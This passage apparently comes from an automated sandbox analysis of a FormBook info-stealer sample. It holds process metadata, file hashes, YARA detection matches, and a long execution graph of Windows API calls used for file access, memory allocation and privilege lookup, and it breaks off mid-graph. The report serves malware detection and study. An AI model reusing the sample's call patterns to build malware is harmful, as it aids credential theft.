                                                                                                              Start date:06/02/2023
                                                                                                              Path:C:\Users\user\Desktop\zeuhAxTIRX.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\user\Desktop\zeuhAxTIRX.exe
                                                                                                              Imagebase:0xe50000
                                                                                                              File size:186368 bytes
                                                                                                              MD5 hash:271AE718B77B74826BB47FA7495EB565
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.576146371.0000000000810000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.576828889.0000000000E51000.00000040.00000001.01000000.00000003.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.576236738.0000000000840000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              Reputation:low

                                                                                                              General

                                                                                                              Target ID:3
                                                                                                              Start time:14:37:45
                                                                                                              Start date:06/02/2023
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                                                              Imagebase:0x7ff618f60000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              General

                                                                                                              Target ID:7
                                                                                                              Start time:14:38:03
                                                                                                              Start date:06/02/2023
                                                                                                              Path:C:\Windows\SysWOW64\autoconv.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\SysWOW64\autoconv.exe
                                                                                                              Imagebase:0x8b0000
                                                                                                              File size:851968 bytes
                                                                                                              MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:moderate

                                                                                                              General

                                                                                                              Target ID:8
                                                                                                              Start time:14:38:04
                                                                                                              Start date:06/02/2023
                                                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                              Imagebase:0x140000
                                                                                                              File size:61952 bytes
                                                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.830673789.00000000041A0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.830024885.00000000002D0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                              Reputation:high

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:8.2%
                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                Signature Coverage:1.6%
                                                                                                                Total number of Nodes:1021
                                                                                                                Total number of Limit Nodes:103
                                                                                                                execution_graph 15137 e5b4f1 15138 e5b518 15137->15138 15139 e5cf33 LdrLoadDll 15138->15139 15140 e5b54b 15139->15140 15141 e5eaf3 2 API calls 15140->15141 15142 e5b570 15140->15142 15141->15142 15040 e5b4f3 15041 e5b518 15040->15041 15042 e5cf33 LdrLoadDll 15041->15042 15043 e5b54b 15042->15043 15044 e5b570 15043->15044 15046 e5eaf3 15043->15046 15047 e5eb1f 15046->15047 15048 e6e423 LdrLoadDll 15047->15048 15049 e5eb38 15048->15049 15050 e5eb3f 15049->15050 15057 e6e463 15049->15057 15050->15044 15054 e5eb7a 15055 e6e6d3 2 API calls 15054->15055 15056 e5eb9d 15055->15056 15056->15044 15058 e6f213 LdrLoadDll 15057->15058 15059 e5eb62 15058->15059 15059->15050 15060 e6ea53 15059->15060 15061 e6f213 LdrLoadDll 15060->15061 15062 e6ea72 15061->15062 15062->15054 15143 e600f1 15144 e6011f 15143->15144 15145 e5d403 LdrLoadDll 15144->15145 15146 e60131 15145->15146 15147 e5ffc3 2 API calls 15146->15147 15148 e60142 15147->15148 15149 e60164 15148->15149 15150 e6014c 15148->15150 15152 e60175 15149->15152 15154 e6e6d3 2 API calls 15149->15154 15151 e60157 15150->15151 15153 e6e6d3 2 API calls 15150->15153 15153->15151 15154->15152 15474 e691ff 15475 e69546 15474->15475 15485 e69217 15474->15485 15476 e6de93 LdrLoadDll 15477 e692fc 15476->15477 15478 e6932b 15477->15478 15479 e69348 15477->15479 15482 e69335 15477->15482 15480 e6e6a3 LdrLoadDll 15478->15480 15481 e6e5a3 2 API calls 15479->15481 15480->15482 15483 e6936f 15481->15483 15484 e70143 2 API calls 15483->15484 15489 e6937b 15484->15489 15485->15475 15485->15476 15486 e6950a 15487 e6e6d3 2 API calls 15486->15487 15490 e69511 15487->15490 15488 e69520 15491 e68f23 3 API calls 15488->15491 15489->15482 15489->15486 15489->15488 15493 e69413 15489->15493 15492 e69533 15491->15492 15494 e6947a 15493->15494 15496 e69422 15493->15496 15494->15486 15495 e6948d 15494->15495 15497 e6e523 LdrLoadDll 15495->15497 15498 e69427 15496->15498 15499 e6943b 15496->15499 15502 e694d5 15497->15502 15503 e68de3 2 API calls 15498->15503 15500 e69440 15499->15500 15501 e69458 15499->15501 15504 e68e83 3 API calls 15500->15504 15501->15490 15508 e68ba3 5 API calls 15501->15508 15505 e6e563 LdrLoadDll 15502->15505 15506 e69431 15503->15506 15507 e6944e 15504->15507 15509 e694ed 15505->15509 15510 e69470 15508->15510 15511 e6e6d3 2 API calls 15509->15511 15512 e694f9 15511->15512 16880 e596fb 16881 e59704 16880->16881 16882 e6e803 LdrLoadDll 16881->16882 16883 e59721 16882->16883 14191 e517c4 14192 e5177c 14191->14192 14193 e517c8 14191->14193 14196 e73393 14192->14196 14199 e6fc43 14196->14199 14200 e6fc69 14199->14200 14213 e5bec3 14200->14213 14202 e6fc75 14203 e517af 14202->14203 14221 e600f3 14202->14221 14205 e6fc94 14206 e6fca7 14205->14206 14233 e600b3 14205->14233 14209 e6fcbc 14206->14209 14242 e6e8f3 14206->14242 14238 e53533 14209->14238 14211 e6fccb 14212 e6e8f3 2 API calls 14211->14212 14212->14203 14245 e5be13 14213->14245 14215 e5bed0 14216 e5bed7 14215->14216 14257 e5bdb3 14215->14257 14216->14202 14222 e6011f 14221->14222 14764 e5d403 14222->14764 14224 e60131 14768 e5ffc3 14224->14768 14227 e60164 14230 e60175 14227->14230 14232 e6e6d3 2 API calls 14227->14232 14228 e6014c 14229 e60157 14228->14229 14231 e6e6d3 2 API calls 14228->14231 14229->14205 14230->14205 14231->14229 14232->14230 14234 e69613 LdrLoadDll 14233->14234 14235 e600d2 14234->14235 14236 e600db GetUserGeoID 14235->14236 14237 e600d9 14235->14237 14236->14206 14237->14206 14239 e5358a 14238->14239 14241 e53597 14239->14241 14784 e5dd93 14239->14784 14241->14211 14243 e6f213 LdrLoadDll 14242->14243 14244 e6e912 ExitProcess 14243->14244 14244->14209 14246 e5be26 14245->14246 14296 e6ce93 14245->14296 14276 e6cd53 14246->14276 14249 e5be39 14249->14215 14250 e5be2f 14250->14249 14279 e6f593 14250->14279 14252 e5be76 14252->14249 14290 e5bc53 14252->14290 14254 e5be96 14300 e5b6b3 14254->14300 14256 e5bea8 14256->14215 14258 e5bdd0 14257->14258 14259 e6f883 LdrLoadDll 14257->14259 14743 e6f883 14258->14743 14259->14258 14262 e6f883 LdrLoadDll 14263 e5bdfd 14262->14263 14264 e5feb3 14263->14264 14265 e5fecc 14264->14265 14751 e5d283 14265->14751 14267 e5fedf 14755 e6e423 14267->14755 14271 e5ff05 14272 e5ff30 14271->14272 14761 e6e4a3 14271->14761 14273 e6e6d3 2 API calls 14272->14273 14275 e5bee8 14273->14275 14275->14202 14304 e6e843 14276->14304 14280 e6f5ac 14279->14280 14335 e69203 14280->14335 14282 e6f5c4 14283 e6f5cd 14282->14283 14374 e6f3d3 14282->14374 14283->14252 14285 e6f5e1 14285->14283 14391 e6e143 14285->14391 14287 e6f615 14394 e70143 14287->14394 14717 e59443 14290->14717 14292 e5bc74 14292->14254 14293 e5bc6d 14293->14292 14730 e59703 14293->14730 14297 e6cea2 14296->14297 14298 e69613 LdrLoadDll 14297->14298 14299 e6ceed 14298->14299 14299->14246 14301 e5b6db 14300->14301 14736 e5d153 14301->14736 14303 e5b711 14303->14256 14307 e6f213 14304->14307 14306 e6cd68 14306->14250 14308 e6f222 14307->14308 14310 e6f298 14307->14310 14308->14310 14311 e69613 14308->14311 14310->14306 14312 e69621 14311->14312 14313 e6962d 14311->14313 14312->14313 14316 e69a93 14312->14316 14313->14310 14321 e69793 14316->14321 14318 e69aab 14319 e69613 LdrLoadDll 14318->14319 14320 e6977f 14318->14320 14319->14320 14320->14310 14323 e697b8 14321->14323 14322 e69827 14322->14318 14323->14322 14324 e5cf33 LdrLoadDll 14323->14324 14325 e69859 14324->14325 14326 e70303 LdrLoadDll 14325->14326 14331 e698fe 14325->14331 14327 e698a0 14326->14327 14328 e698f7 14327->14328 14329 e69964 14327->14329 14327->14331 14328->14331 14333 e69a93 LdrLoadDll 14328->14333 14330 e69a93 LdrLoadDll 14329->14330 14329->14331 14332 e69996 14330->14332 14331->14318 14332->14318 14334 e6995a 14333->14334 14334->14318 14336 e69546 14335->14336 14346 e69217 14335->14346 14336->14282 14339 e6932b 14457 e6e6a3 14339->14457 14340 e69348 14400 e6e5a3 14340->14400 14343 e69335 14343->14282 14344 e6936f 14345 e70143 2 API calls 14344->14345 14350 e6937b 14345->14350 14346->14336 14397 e6de93 14346->14397 14347 e6950a 14348 e6e6d3 2 API calls 14347->14348 14351 e69511 14348->14351 14349 e69520 14482 e68f23 14349->14482 14350->14343 14350->14347 14350->14349 14354 e69413 14350->14354 14351->14282 14353 e69533 14353->14282 14355 e6947a 14354->14355 14357 e69422 14354->14357 14355->14347 14356 e6948d 14355->14356 14473 e6e523 14356->14473 14359 e69427 14357->14359 14360 e6943b 14357->14360 14460 e68de3 14359->14460 14361 e69440 14360->14361 14362 e69458 14360->14362 14403 e68e83 14361->14403 14362->14351 14415 e68ba3 14362->14415 14367 e69431 14367->14282 14368 e6944e 14368->14282 14371 e69470 14371->14282 14373 e694f9 14373->14282 14375 e6f3ee 14374->14375 14376 e6f400 14375->14376 14549 e700c3 14375->14549 14376->14285 14378 e6f420 14552 e68803 14378->14552 14380 e6f443 14380->14376 14381 e68803 3 API calls 14380->14381 14383 e6f465 14381->14383 14383->14376 14584 e69b63 14383->14584 14384 e6f4ed 14386 e6f4fd 14384->14386 14677 e6f193 14384->14677 14595 e6f003 14386->14595 14388 e6f52b 14674 e6e103 14388->14674 14390 e6f555 14390->14285 14392 e6f213 LdrLoadDll 14391->14392 14393 e6e15f 14392->14393 14393->14287 14714 e6e8b3 14394->14714 14396 e6f63f 14396->14252 14398 e6f213 LdrLoadDll 14397->14398 14399 e692fc 14398->14399 14399->14339 14399->14340 14399->14343 14401 e6f213 LdrLoadDll 14400->14401 14402 e6e5bf NtCreateFile 14401->14402 14402->14344 14404 e68e9f 14403->14404 14405 e6e523 LdrLoadDll 14404->14405 14406 e68ec0 14405->14406 14407 e68ec7 14406->14407 14408 e68edb 14406->14408 14410 e6e6d3 2 API calls 14407->14410 14409 e6e6d3 2 API calls 14408->14409 14411 e68ee4 14409->14411 14412 e68ed0 14410->14412 14520 e70263 14411->14520 14412->14368 14414 e68eef 14414->14368 14416 e68c21 14415->14416 14417 e68bee 14415->14417 14419 e68d6c 14416->14419 14422 e68c3d 14416->14422 14418 e6e523 LdrLoadDll 14417->14418 14420 e68c09 14418->14420 14421 e6e523 LdrLoadDll 14419->14421 14423 e6e6d3 2 API calls 14420->14423 14427 e68d87 14421->14427 14424 e6e523 LdrLoadDll 14422->14424 14425 e68c12 14423->14425 14426 e68c58 14424->14426 14425->14371 14429 e68c74 14426->14429 14430 e68c5f 14426->14430 14428 e6e563 LdrLoadDll 14427->14428 14431 e68dc1 14428->14431 14433 e68c8f 14429->14433 14434 e68c79 14429->14434 14432 e6e6d3 2 API calls 14430->14432 14435 e6e6d3 2 API calls 14431->14435 14436 e68c68 14432->14436 14442 e68c94 14433->14442 14526 e70223 14433->14526 14437 e6e6d3 2 API calls 14434->14437 14438 e68dcc 14435->14438 14436->14371 14439 e68c82 14437->14439 14438->14371 14439->14371 14451 e68ca6 14442->14451 14529 e6e653 14442->14529 14443 e68cfa 14444 e68d11 14443->14444 14537 e6e4e3 14443->14537 14446 e68d2d 14444->14446 14447 e68d18 14444->14447 14448 e6e6d3 2 API calls 14446->14448 14449 e6e6d3 2 API calls 14447->14449 14450 e68d36 14448->14450 14449->14451 14452 e68d62 14450->14452 14532 e6ff43 14450->14532 14451->14371 14452->14371 14454 e68d4d 14455 e70143 2 API calls 14454->14455 14456 e68d56 14455->14456 14456->14371 14458 e6f213 LdrLoadDll 14457->14458 14459 e6e6bf 14458->14459 14459->14343 14540 e6e203 14460->14540 14463 e68e27 14465 e6e6d3 2 API calls 14463->14465 14464 e68e3b 14543 e6e253 14464->14543 14468 e68e30 14465->14468 14468->14367 14469 e6e6d3 2 API calls 14470 e68e65 14469->14470 14471 e6e6d3 2 API calls 14470->14471 14472 e68e6f 14471->14472 14472->14367 14474 e6f213 LdrLoadDll 14473->14474 14475 e694d5 14474->14475 14476 e6e563 14475->14476 14477 e6f213 LdrLoadDll 14476->14477 14478 e694ed 14477->14478 14479 e6e6d3 14478->14479 14480 e6f213 LdrLoadDll 14479->14480 14481 e6e6ef NtClose 14480->14481 14481->14373 14483 e6e523 LdrLoadDll 14482->14483 14484 e68f61 14483->14484 14485 e68f7f 14484->14485 14486 e68f6a 14484->14486 14488 e68fa3 14485->14488 14489 e68fed 14485->14489 14487 e6e6d3 2 API calls 14486->14487 14501 e68f73 14487->14501 14546 e6e603 14488->14546 14491 e68ff2 14489->14491 14492 e69033 14489->14492 14495 e6e653 2 API calls 14491->14495 14491->14501 14496 e69045 14492->14496 14500 e691c0 14492->14500 14494 e6e6d3 2 API calls 14494->14501 14497 e6901d 14495->14497 14498 e6904a 14496->14498 14506 e69085 14496->14506 14502 e6e6d3 2 API calls 14497->14502 14499 e6e603 LdrLoadDll 14498->14499 14503 e6906d 14499->14503 14500->14501 14504 e6e6d3 2 API calls 14500->14504 14501->14353 14505 e69026 14502->14505 14507 e6e6d3 2 API calls 14503->14507 14508 e691f1 14504->14508 14505->14353 14509 e6908a 14506->14509 14515 e69169 14506->14515 14510 e69076 14507->14510 14508->14353 14509->14501 14511 e6e603 LdrLoadDll 14509->14511 14510->14353 14512 e690ad 14511->14512 14513 e6e6d3 2 API calls 14512->14513 14514 e690b8 14513->14514 14514->14353 14515->14501 14516 e6e603 LdrLoadDll 14515->14516 14517 e691a8 14516->14517 14518 e6e6d3 2 API calls 14517->14518 14519 e691b1 14518->14519 14519->14353 14523 e6e873 14520->14523 14522 e7027d 14522->14414 14524 e6f213 LdrLoadDll 14523->14524 14525 e6e88f RtlAllocateHeap 14524->14525 14525->14522 14527 e6e873 2 API calls 14526->14527 14528 e7023b 14527->14528 14528->14442 14530 e6f213 LdrLoadDll 14529->14530 14531 e6e66f NtReadFile 14530->14531 14531->14443 14533 e6ff67 14532->14533 14534 e6ff50 14532->14534 14533->14454 14534->14533 14535 e70223 2 API calls 14534->14535 14536 e6ff7e 14535->14536 14536->14454 14538 e6f213 LdrLoadDll 14537->14538 14539 e6e4ff 14538->14539 14539->14444 14541 e6f213 LdrLoadDll 14540->14541 14542 e68e20 14541->14542 14542->14463 14542->14464 14544 e6f213 LdrLoadDll 14543->14544 14545 e68e5c 14544->14545 14545->14469 14547 e6f213 LdrLoadDll 14546->14547 14548 e68fc8 14547->14548 14548->14494 14682 e6e783 14549->14682 14551 e700f0 14551->14378 14553 e68814 14552->14553 14555 e6881c 14552->14555 14553->14380 14554 e68aef 14554->14380 14555->14554 14685 e712c3 14555->14685 14557 e68870 14558 e712c3 2 API calls 14557->14558 14561 e6887b 14558->14561 14559 e688c9 14562 e712c3 2 API calls 14559->14562 14561->14559 14563 e713f3 3 API calls 14561->14563 14699 e71363 14561->14699 14565 e688dd 14562->14565 14563->14561 14564 e6893a 14566 e712c3 2 API calls 14564->14566 14565->14564 14690 e713f3 14565->14690 14568 e68950 14566->14568 14569 e6898d 14568->14569 14572 e713f3 3 API calls 14568->14572 14570 e712c3 2 API calls 14569->14570 14571 e68998 14570->14571 14573 e713f3 3 API calls 14571->14573 14579 e689d2 14571->14579 14572->14568 14573->14571 14576 e71323 2 API calls 14577 e68ad1 14576->14577 14578 e71323 2 API calls 14577->14578 14580 e68adb 14578->14580 14696 e71323 14579->14696 14581 e71323 2 API calls 14580->14581 14582 e68ae5 14581->14582 14583 e71323 2 API calls 14582->14583 14583->14554 14585 e69b74 14584->14585 14586 e69203 6 API calls 14585->14586 14591 e69b8a 14586->14591 14587 e69b93 14587->14384 14588 e69bca 14589 e70143 2 API calls 14588->14589 14590 e69bdb 14589->14590 14590->14384 14591->14587 14591->14588 14592 e69c16 14591->14592 14593 e70143 2 API calls 14592->14593 14594 e69c1b 14593->14594 14594->14384 14705 e6ee93 14595->14705 14597 e6f017 14598 e6ee93 LdrLoadDll 14597->14598 14599 e6f020 14598->14599 14600 e6ee93 LdrLoadDll 14599->14600 14601 e6f029 14600->14601 14602 e6ee93 LdrLoadDll 14601->14602 14603 e6f032 14602->14603 14604 e6ee93 LdrLoadDll 14603->14604 14605 e6f03b 14604->14605 14606 e6ee93 LdrLoadDll 14605->14606 14607 e6f044 14606->14607 14608 e6ee93 LdrLoadDll 14607->14608 14609 e6f050 14608->14609 14610 e6ee93 LdrLoadDll 14609->14610 14611 e6f059 14610->14611 14612 e6ee93 LdrLoadDll 14611->14612 14613 e6f062 14612->14613 14614 e6ee93 LdrLoadDll 14613->14614 14615 e6f06b 14614->14615 14616 e6ee93 LdrLoadDll 14615->14616 14617 e6f074 14616->14617 14618 e6ee93 LdrLoadDll 14617->14618 14619 e6f07d 14618->14619 14620 e6ee93 LdrLoadDll 14619->14620 14621 e6f089 14620->14621 14622 e6ee93 LdrLoadDll 14621->14622 14623 e6f092 14622->14623 14624 e6ee93 LdrLoadDll 14623->14624 14625 e6f09b 14624->14625 14626 e6ee93 LdrLoadDll 14625->14626 14627 e6f0a4 14626->14627 14628 e6ee93 LdrLoadDll 14627->14628 14629 e6f0ad 14628->14629 14630 e6ee93 LdrLoadDll 14629->14630 14631 e6f0b6 14630->14631 14632 e6ee93 LdrLoadDll 14631->14632 14633 e6f0c2 14632->14633 14634 e6ee93 LdrLoadDll 14633->14634 14635 e6f0cb 14634->14635 14636 e6ee93 LdrLoadDll 14635->14636 14637 e6f0d4 14636->14637 14638 e6ee93 LdrLoadDll 14637->14638 14639 e6f0dd 14638->14639 14640 e6ee93 LdrLoadDll 14639->14640 14641 e6f0e6 14640->14641 14642 e6ee93 LdrLoadDll 14641->14642 14643 e6f0ef 14642->14643 14644 e6ee93 LdrLoadDll 14643->14644 14645 e6f0fb 14644->14645 14646 e6ee93 LdrLoadDll 14645->14646 14647 e6f104 14646->14647 14648 e6ee93 LdrLoadDll 14647->14648 14649 e6f10d 14648->14649 14650 e6ee93 LdrLoadDll 14649->14650 14651 e6f116 14650->14651 14652 e6ee93 LdrLoadDll 14651->14652 14653 e6f11f 14652->14653 14654 e6ee93 LdrLoadDll 14653->14654 14655 e6f128 14654->14655 14656 e6ee93 LdrLoadDll 14655->14656 14657 e6f134 14656->14657 14658 e6ee93 LdrLoadDll 14657->14658 14659 e6f13d 14658->14659 14660 e6ee93 LdrLoadDll 14659->14660 14661 e6f146 14660->14661 14662 e6ee93 LdrLoadDll 14661->14662 14663 e6f14f 14662->14663 14664 e6ee93 LdrLoadDll 14663->14664 14665 e6f158 14664->14665 14666 e6ee93 LdrLoadDll 14665->14666 14667 e6f161 14666->14667 14668 e6ee93 LdrLoadDll 14667->14668 14669 e6f16d 14668->14669 14670 e6ee93 LdrLoadDll 14669->14670 14671 e6f176 14670->14671 14672 e6ee93 LdrLoadDll 14671->14672 14673 e6f17f 14672->14673 14673->14388 14675 e6f213 LdrLoadDll 14674->14675 14676 e6e11f 14675->14676 14676->14390 14679 e6f1a5 14677->14679 14678 e6f1b4 14678->14386 14679->14678 14711 e6e703 14679->14711 14683 e6f213 LdrLoadDll 14682->14683 14684 e6e79f NtAllocateVirtualMemory 14683->14684 14684->14551 14686 e712d3 14685->14686 14687 e712d9 14685->14687 14686->14557 14688 e70223 2 API calls 14687->14688 14689 e712ff 14688->14689 14689->14557 14691 e71363 14690->14691 14692 e713c0 14691->14692 14693 e70223 2 API calls 14691->14693 14692->14565 14694 e7139d 14693->14694 14695 e70143 2 API calls 14694->14695 14695->14692 14697 e70143 2 API calls 14696->14697 14698 e68ac7 14697->14698 14698->14576 14700 e713c0 14699->14700 14701 e71388 14699->14701 14700->14561 14702 e70223 2 API calls 14701->14702 14703 e7139d 14702->14703 14704 e70143 2 API calls 14703->14704 14704->14700 14706 e6eeae 14705->14706 14707 e69613 LdrLoadDll 14706->14707 14708 e6eece 14707->14708 14709 e69613 LdrLoadDll 14708->14709 14710 e6ef82 14708->14710 14709->14710 14710->14597 14710->14710 14712 e6f213 LdrLoadDll 14711->14712 14713 e6e71f 14712->14713 14713->14386 14715 e6f213 LdrLoadDll 14714->14715 14716 e6e8cf RtlFreeHeap 14715->14716 14716->14396 14718 e59453 14717->14718 14719 e5944e 14717->14719 14720 e700c3 2 API calls 14718->14720 14719->14293 14729 e59478 14720->14729 14721 e594db 14721->14293 14722 e6e103 LdrLoadDll 14722->14729 14723 e594e1 14725 e59507 14723->14725 14726 e6e803 LdrLoadDll 14723->14726 14725->14293 14727 e594f8 14726->14727 14727->14293 14728 e700c3 2 API calls 14728->14729 14729->14721 14729->14722 14729->14723 14729->14728 14733 e6e803 14729->14733 14731 e59721 14730->14731 14732 e6e803 LdrLoadDll 14730->14732 14731->14254 14732->14731 14734 e6f213 LdrLoadDll 14733->14734 14735 e6e81f 14734->14735 14735->14729 14737 e5d177 14736->14737 14739 e5d1b1 14737->14739 14740 e6ded3 14737->14740 14739->14303 14741 e6f213 LdrLoadDll 14740->14741 14742 e6deef 14741->14742 14742->14739 14744 e6f8a6 14743->14744 14747 e5cf33 14744->14747 14748 e5cf57 14747->14748 14749 e5cf93 LdrLoadDll 14748->14749 14750 e5bde4 14748->14750 14749->14750 14750->14262 14752 e5d2a6 14751->14752 14753 e6ded3 LdrLoadDll 14752->14753 14754 e5d323 14752->14754 14753->14754 14754->14267 14756 e6f213 LdrLoadDll 14755->14756 14757 e5feee 14756->14757 14757->14275 14758 e6ea13 14757->14758 14759 e6f213 LdrLoadDll 14758->14759 14760 e6ea32 LookupPrivilegeValueW 14759->14760 14760->14271 14762 e6f213 LdrLoadDll 14761->14762 14763 e6e4bf 14762->14763 14763->14272 14765 e5d42a 14764->14765 14766 e5d283 LdrLoadDll 14765->14766 14767 e5d48d 14766->14767 14767->14224 14769 e60093 14768->14769 14770 e5ffdd 14768->14770 14769->14227 14769->14228 14771 e5d283 LdrLoadDll 14770->14771 14772 e5ffff 14771->14772 14778 e6e183 14772->14778 14774 e60041 14781 e6e1c3 14774->14781 14777 e6e6d3 2 API calls 14777->14769 14779 e6f213 LdrLoadDll 14778->14779 14780 e6e19f 14779->14780 14780->14774 14782 e6f213 LdrLoadDll 14781->14782 14783 e60087 14782->14783 14783->14777 14785 e5ddbe 14784->14785 14786 e5d403 LdrLoadDll 14785->14786 14787 e5de15 14786->14787 14820 e5d083 14787->14820 14789 e5de3b 14819 e5e08c 14789->14819 14829 e68b33 14789->14829 14791 e5de80 14791->14819 14832 e5a073 14791->14832 14793 e5dec4 14793->14819 14854 e6e743 14793->14854 14797 e5df1a 14798 e5df21 14797->14798 14799 e6e253 LdrLoadDll 14797->14799 14800 e70143 2 API calls 14798->14800 14801 e5df5e 14799->14801 14802 e5df2e 14800->14802 14803 e5df6b 14801->14803 14806 e5df7b 14801->14806 14802->14241 14804 e70143 2 API calls 14803->14804 14805 e5df72 14804->14805 14805->14241 14807 e60183 LdrLoadDll 14806->14807 14808 e5dfef 14807->14808 14808->14798 14809 e5dffa 14808->14809 14810 e70143 2 API calls 14809->14810 14811 e5e01e 14810->14811 14864 e6e2a3 14811->14864 14814 e6e253 LdrLoadDll 14815 e5e059 14814->14815 14815->14819 14867 e6e063 14815->14867 14818 e6e8f3 2 API calls 14818->14819 14819->14241 14821 e5d094 14820->14821 14822 e5d090 14820->14822 14823 e5d0ad 14821->14823 14824 e5d0df 14821->14824 14822->14789 14870 e6df13 14823->14870 14825 e6df13 LdrLoadDll 14824->14825 14826 e5d0f0 14825->14826 14826->14789 14830 e60183 LdrLoadDll 14829->14830 14831 e68b59 14830->14831 14831->14791 14873 e5a2a3 14832->14873 14834 e5a299 14834->14793 14835 e5a091 14835->14834 14836 e59443 2 API calls 14835->14836 14837 e5a16f 14835->14837 14847 e5a0cf 14836->14847 14837->14834 14839 e59443 2 API calls 14837->14839 14841 e5a24f 14837->14841 14851 e5a1ac 14839->14851 14841->14834 14920 e603f3 14841->14920 14842 e603f3 6 API calls 14843 e5a279 14842->14843 14843->14834 14844 e603f3 6 API calls 14843->14844 14845 e5a28f 14844->14845 14845->14793 14847->14837 14848 e5a165 14847->14848 14887 e59d53 14847->14887 14849 e59703 LdrLoadDll 14848->14849 14849->14837 14850 e59d53 7 API calls 14850->14851 14851->14841 14851->14850 14852 e5a245 14851->14852 14853 e59703 LdrLoadDll 14852->14853 14853->14841 14855 e6f213 LdrLoadDll 14854->14855 14856 e5defb 14855->14856 14857 e60183 14856->14857 14858 e601a0 14857->14858 14859 e6e203 LdrLoadDll 14858->14859 14860 e601e1 14859->14860 14861 e601e8 14860->14861 14862 e6e253 LdrLoadDll 14860->14862 14861->14797 14863 e60211 14862->14863 14863->14797 14865 e6f213 LdrLoadDll 14864->14865 14866 e5e032 14865->14866 14866->14814 14868 e6f213 LdrLoadDll 14867->14868 14869 e5e085 14868->14869 14869->14818 14871 e6f213 LdrLoadDll 14870->14871 14872 e5d0cf 14871->14872 14872->14789 14875 e5a2ca 14873->14875 14874 e5a52f 14874->14835 14875->14874 14876 e59443 2 API calls 14875->14876 14877 e5a31d 14876->14877 14877->14874 14878 e59703 LdrLoadDll 14877->14878 14879 e5a3ac 14878->14879 14879->14874 14880 e59443 2 API calls 14879->14880 14881 e5a3c1 14880->14881 14881->14874 14882 e59703 LdrLoadDll 14881->14882 14885 e5a421 14882->14885 14883 e59443 2 API calls 14883->14885 14884 e59d53 7 API calls 14884->14885 14885->14874 14885->14883 14885->14884 14886 e59703 